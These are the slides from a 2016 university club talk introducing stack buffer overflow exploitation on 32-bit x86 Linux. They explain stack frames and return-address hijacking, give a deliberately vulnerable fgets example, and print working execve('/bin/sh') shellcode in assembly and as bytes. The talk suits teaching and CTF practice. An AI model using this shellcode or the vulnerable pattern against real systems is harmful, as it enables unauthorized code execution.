Intro to Binary Exploitation

Mark Mossberg

NU Hacks

Spring 2016

github.com/hacks/ibe2016

whoami

  • Senior computer engineering major

  • Low level enthusiast

  • CTF casual

    • Mostly with Shellphish

  • http://vmresu.me

Agenda

  • Introduction
  • Background Info
    • Crash course in C, x86 
  • Stack buffer overflow
    • Vulnerability
    • Exploitation
  • Workshop

Disclaimers

  • All information provided in this presentation exists for educational purposes only.
  • This is not "modern" exploitation.
  • Much of the following is only relevant for x86 Linux.

What is Binary Exploitation?

Binary exploitation is the art of bending a computer program to your will

From https://picoctf.com/learn

What is Binary Exploitation?

  • Binary: Executable file containing a computer program in the form of assembly instructions
  • Exploitation: Taking advantage of a vulnerability in a computer program in order to cause unintended behavior (wikipedia)

Unintended behavior?

  • Read: "Arbitrary Code Execution"
  • Primary objective of exploitation
  • ​"Code" == Processor Instructions​
  • Basically, take over their CPU and force it to do whatever we want.
  • The code we execute is called the "payload"

High Level Challenges

  1. Hijack program's execution flow
  2. Perform arbitrary computation

C

  • Created in the 1970's for writing UNIX
  • Imperative, static typed, compiled
  • "Low level", largely used for systems programming
  • Widespread
    • Operating Systems
    • Embedded Systems
    • Network Services
    • Programming Languages 🐍
  • Memory unsafe

For more extensive background, see http://github.com/rpisec/mbe

C Strings

  • No "strings", just NULL-terminated char arrays
    • "NULL-terminated" == ends with a '\0' char
  • many libc APIs oriented around this
    • String operations: strcpy(), strcat(), strlen(), etc
    • I/O operations: read(), write(), fgets(), etc
  • Bug prone :)
// this is not good C,
// just illustrating buffers
void hello(void) {
    char message[10];
    strcpy(message, "Hello\n");
    printf("%s", message);
}

x86

  • 32 bit CPU Architecture designed by Intel
    • Defines a set of "instructions" available for programs to use. Low level operations like arithmetic, memory
    • Defines set of "registers" for computation and state (think hardware variables)
      • Important ones: esp (stack ptr), ebp (frame ptr), eip (instruction ptr)
  • Little endian
    • In memory, numbers are stored LSB first
    • Will be relevant when writing our exploit payload

C Compilation: Stack Variables

void myfunction(void) {
    // local, stack variables.
    int a = 1;
    int b = 2;
    int c = 3;
}
  • Function local variables allocated in "stack" memory
  • Implemented by compiler as subtracting esp (stack ptr) register by space needed (in bytes)
    • Stack grows down
080483cb <myfunction>:
 80483cb:  push   ebp
 80483cc:  mov    ebp,esp
 80483ce:  sub    esp,0x10
 80483d1:  mov    DWORD PTR [ebp-0x4],0x1
 80483d8:  mov    DWORD PTR [ebp-0x8],0x2
 80483df:  mov    DWORD PTR [ebp-0xc],0x3
 80483e6:  leave
 80483e7:  ret

C Compilation: Function Calls

void myfunction1(void) {
    myfunction2(1, 2, 3);
}
void myfunction2(int a, int b, int c) {
    a = 0xff; b = 0xff; c = 0xff;
}
080483cb <myfunction1>:
 80483cb: push   ebp
 80483cc: mov    ebp,esp
 80483ce: sub    esp,0x8
 80483d1: sub    esp,0x4
 80483d4: push   0x3
 80483d6: push   0x2
 80483d8: push   0x1
 80483da: call   80483e4 <myfunction2>
 80483df: add    esp,0x10
 80483e2: leave
 80483e3: ret

080483e4 <myfunction2>:
 80483e4: push   ebp
 80483e5: mov    ebp,esp
 80483e7: mov    DWORD PTR [ebp+0x8],0xff
 80483ee: mov    DWORD PTR [ebp+0xc],0xff
 80483f5: mov    DWORD PTR [ebp+0x10],0xff
 80483fc: pop    ebp
 80483fd: ret

myfunc2

  • "cdecl" calling convention
  • Caller pushes arguments onto stack, execs call instruc.
    • call pushes eip on stack, jumps to operand
  • Callee sets up new frame with ebp/esp. At end of function, it restores stack, and execs ret
    • ​ret pops stack into eip
  • This is how functions know where to return to

C Compilation: Function Calls

void myfunction1(void) {
    myfunction2(1, 2, 3);
}
void myfunction2(int a, int b, int c) {
    a = 0xff; b = 0xff; c = 0xff;
}
080483cb <myfunction1>:
 80483cb: push   ebp
 80483cc: mov    ebp,esp
 80483ce: sub    esp,0x8
 80483d1: sub    esp,0x4
 80483d4: push   0x3
 80483d6: push   0x2
 80483d8: push   0x1
 80483da: call   80483e4 <myfunction2>
 80483df: add    esp,0x10
 80483e2: leave
 80483e3: ret

080483e4 <myfunction2>:
 80483e4: push   ebp
 80483e5: mov    ebp,esp
 80483e7: mov    DWORD PTR [ebp+0x8],0xff
 80483ee: mov    DWORD PTR [ebp+0xc],0xff
 80483f5: mov    DWORD PTR [ebp+0x10],0xff
 80483fc: pop    ebp
 80483fd: ret

Takeaway: Program execution control data is stored on stack!

Memory Unsafety

  • C does not stop you from trampling your own memory
    • You crash if you're lucky
  • Programmer's responsibility to ensure safety, not language's
  • Memory Corruption: when the contents of a memory location are unintentionally modified due to programming errors
    • ex: Writing off the end of an array

Definition from https://en.m.wikipedia.org/wiki/Memory_corruption

void func(void) {
    int arr[4];
    for (int i = 0; i < 8; i++) {
        arr[i] = 0xffffffff;
    }
}

Corrupting Stack Memory!

Perfectly legit C though

🔥🔥🔥🔥

🔥🔥🔥🔥

🔥🔥🔥🔥

🔥🔥🔥🔥

Spot the bug

void func(void) {
    // 15 byte string + NULL
    char buf[16];
    // read up to 165 bytes + NULL from stdin
    fgets(buf, 166, stdin);
    printf("Hello %s\n", buf);
}

what's dangerous about this code?

Spot the bug

void func(void) {
    // 15 byte string + NULL
    char buf[16];
    // read up to 165 bytes + NULL from stdin
    fgets(buf, 166, stdin);
    printf("Hello %s\n", buf);
}

what's dangerous about this code?

🔥🔥🔥🔥

🔥🔥🔥🔥

🔥🔥🔥🔥

🔥🔥🔥🔥

🔥🔥🔥🔥

🔥🔥🔥🔥

🔥🔥🔥🔥

🔥🔥🔥🔥

🔥🔥🔥🔥

🔥🔥🔥🔥

user can control 150 bytes after buf! (including return address!)

👈👈👈

Stack Buffer Overflows

  • Result from bugs allowing more data written onto stack than space allocated for it
  • Commonly seen in C string handling
  • Dangerous, because program control info is stored on stack (ret addr) and could be corrupted

High Level Challenges

  1. ✅ Hijack program's execution flow
  2. Perform arbitrary computation

Exploitation

  • Use buffer overflow to copy our payload onto the stack
  • Corrupt the return address on the stack to point to it
  • When function returns, our payload executes

Exploitation

High Level Challenges

  1. ✅ Hijack program's execution flow
  2. ✅ Perform arbitrary computation

Exploit Payload ("Shellcode")

  • What code should we put on the stack?
  • Code that executes a shell! (Gives us access to the system)
    • Note: Payloads don't have to exec a shell to be called shellcode
  • Traditionally written in assembly due to constraints

Exploit Payload ("Shellcode")

  • How will our shellcode execute a shell?
  • How does any program execute any other program?
  • execve()

System Calls

  • System Call: The interface programs use for calling into the Operating System
  • Programs do these to do anything related to the real world
  • If we want our exploit payload to do anything, it will need to trigger a syscall
    • "execve" is syscall used to execute other programs
  • Triggered by architecture specific instructions
    • For x86, we'll use "int 0x80"
execve(char *filename, char *argv[], char *envp[]);
  • Arg 1: Path to file to execute
    • "/bin/sh"
  • Arg 2: Array of program arguments
    • {"/bin/sh", NULL}
  • Arg 3: Array of environment vars
    • NULL
  • Set syscall arguments in registers before triggering syscall instruction
    • ​eax = syscall # (0xb)
    • ebx = filename
    • ecx = argv
    • edx = envp

Writing Shellcode

  1. Write in C
  2. Hand compile to x86
  3. Assemble to machine code
char *args[] = {"/bin/sh", NULL};
execve(args[0], args, NULL);
; I didn't write this, I found it on the
; internet a while ago

xor    eax,eax    ; int eax = 0
push   eax
push   0x68732f2f ; these three create "/bin//sh\0"
push   0x6e69622f ; on the stack
mov    ebx,esp    ; char *ebx = "/bin//sh";
push   eax
push   ebx
mov    ecx,esp    ; char *ecx = {"/bin//sh", 0};
mov    edx,eax    ; int edx = 0
mov    al,0xb     ; 0xb is syscall number for execve
int    0x80       ; trigger syscall
sc = ("\x31\xc0\x50\x68\x2f" +
      "\x2f\x73\x68\x68\x2f" +
      "\x62\x69\x6e\x89\xe3" +
      "\x50\x53\x89\xe1\x89" +
      "\xc2\xb0\x0b\xcd\x80")

Modern Defenses

  • DEP/NX (Data Execution Prevention/No eXecute)
    • Hardware support, disable executable stack
  • ASLR (Address Space Layout Randomization)
    • Randomizes address of stack variables
  • Stack Cookies/Canaries
    • Compiler inserts code to check integrity of stack before returning from functions

Local vs Remote Exploits

  • Local Exploit: Exploiting a program running on the same machine
    • Privilege Escalation
  • Remote Exploit: Exploiting a program running on a different machine (over a network)
    • Jailbreakmes

That was a lot! Lets pwn some stuff.

Questions?/Workshop

Intro to Binary Exploitation

By offlinemark

Intro to Binary Exploitation

NU Hacks talk, 3/31/16.

  • 1,693